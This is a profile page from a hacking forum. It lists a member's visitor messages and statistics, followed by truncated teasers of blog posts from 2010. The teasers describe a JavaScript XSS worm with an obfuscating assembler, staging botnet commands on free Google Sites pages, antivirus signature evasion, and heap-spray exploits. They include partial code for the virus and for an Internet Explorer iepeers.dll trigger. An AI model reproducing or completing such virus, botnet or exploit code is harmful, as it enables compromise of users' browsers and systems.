2 Visitor Messages

  1. View Conversation
    Did you brought alfa card? From where?
  2. View Conversation
    one question since its not my field of specialisation -
    I have seen XSSed pages of major websites with simple cookie display vulns/ alert boxes. Is there a way to know what is the severity of the vulnerability, ie its persistent in nature or not ?

    cheers
Showing Visitor Messages 1 to 2 of 2
About prashant_uniyal

Basic Information


Age
19
About prashant_uniyal
Biography:
A student by day..and a Hacker by night :)
Location:
localhost
Interests:
Ethical hacking, Penetration testing ,Exploit code development, cyber security

Signature


I was b0rn to Hack..But schooling ruined me
____________________________________________
http://blog.secfence.com

Statistics


Total Posts
Total Posts
451
Posts Per Day
0.66
Visitor Messages
Total Messages
2
Most Recent Message
07-31-2011 12:48 AM
Total Thanks
Total Thanks
222
  • Thanked 84 Times in 47 Posts
General Information
Last Activity
05-17-2012 02:49 PM
Join Date
07-08-2010
Referrals
4

6 Friends

  1. ajaysinghnegi ajaysinghnegi is offline

    Garage Member

    • Send a message via MSN to ajaysinghnegi
    • Send a message via Yahoo to ajaysinghnegi
    ajaysinghnegi
  2. AP4CH3 AP4CH3 is offline

    Garage Newcomer

    AP4CH3
  3. cyberkalki cyberkalki is offline

    Garage Newcomer

    cyberkalki
  4. D4rk357 D4rk357 is offline

    Garage Member

    D4rk357
  5. mayjune mayjune is offline

    Garage Member

    mayjune
  6. rishabhd rishabhd is offline

    Garage Newcomer

    rishabhd
Showing Friends 1 to 6 of 6
View prashant_uniyal's Blog

Recent Entries

Demystifying The Ashi virus--"vinnu" PART III

by prashant_uniyal on 08-23-2010 at 03:26 PM
Now I just need to scramble the code. For this purpose I created a HTML file containing the code and encoder and decoder. This file will assemble the virus and will provide us the viral code. The HTML code is:
<html>
<head><title>Ashi assmebler by "vinnu"</title>
<script language=javascript>
var ashi='trigger();function trigger(){var
vin=document.getElementsByTagName(\"a\");var total=0;var index=0;var
address;for(var

Read More

Categories
Uncategorized

Demystifying The Ashi virus--"vinnu" PART II

by prashant_uniyal on 08-23-2010 at 01:49 PM
This is a google's free page uploading facility (http://sites.google.com/site). I loaded the .js file as an attatchment. But it contained nothing initially.It was meant for controlling the Botnet and commanding it later in forming the XSS tunnels. It was the second stage of two staged botnet formation.Note: The third party free sites are also useful to connect to a botnet if you do not have any dedicated server. In ur script file at free site like google,you can place a script that can redirect

Read More

Categories
Uncategorized

Evading AV Signatures..Derailing the Antivirus--"vinnu"

by prashant_uniyal on 08-10-2010 at 07:44 PM
Evading AV Signatures..Derailing the Antivirus

Author: "vinnu"
Greetz : Prashant Uniyal, b0nd, Lord Deathstorm, D4rk357, G4H
Team : Legion Of Xtremers (LOX).


The perimeter defence (antivirus) is still considered fullproof measure by most of people
in virtual world. Such an assumption is fatal and can lead to more sophisticated compromise
of systems.

Note: In my last paper, "Heap spray -- Slipping CPU

Read More

Categories
Uncategorized

Heap Spray --- Slipping CPU to our pocket--continued

by prashant_uniyal on 08-06-2010 at 07:11 PM
Above exploit will take nearly a minute to spraY the heap. Also study the performance graph of memory and cpu in taskmanager for
better understanding the heap spray technique.


2. IE iepeers:

The following code can trigger the vulnerability in ieepeers.dll in internet explorer:


<html><body>
<button id='butid' onclick='trigger();' style='display:none'></button>

<!--place the sprayer

Read More

Categories
Uncategorized

Heap Spray --- Slipping CPU to our pocket--by "vinnu"

by prashant_uniyal on 08-06-2010 at 07:10 PM
Heap Spray --- Slipping CPU to our pocket

Author : "vinnu"
Team : "Legion Of Xtremers" (LOXians)
Greetz : Prashant Uniyal, b0nd, D4rk357, skylined

Rootkit Information:

IDE: any text editor
Language : Javascript
Targets: Web browsers


As the name defines itself Heap Spray technique uses the spraying of heap memory
with injection vector.
Injection Vector: Nop sled + Shellcode

Read More

Categories
Uncategorized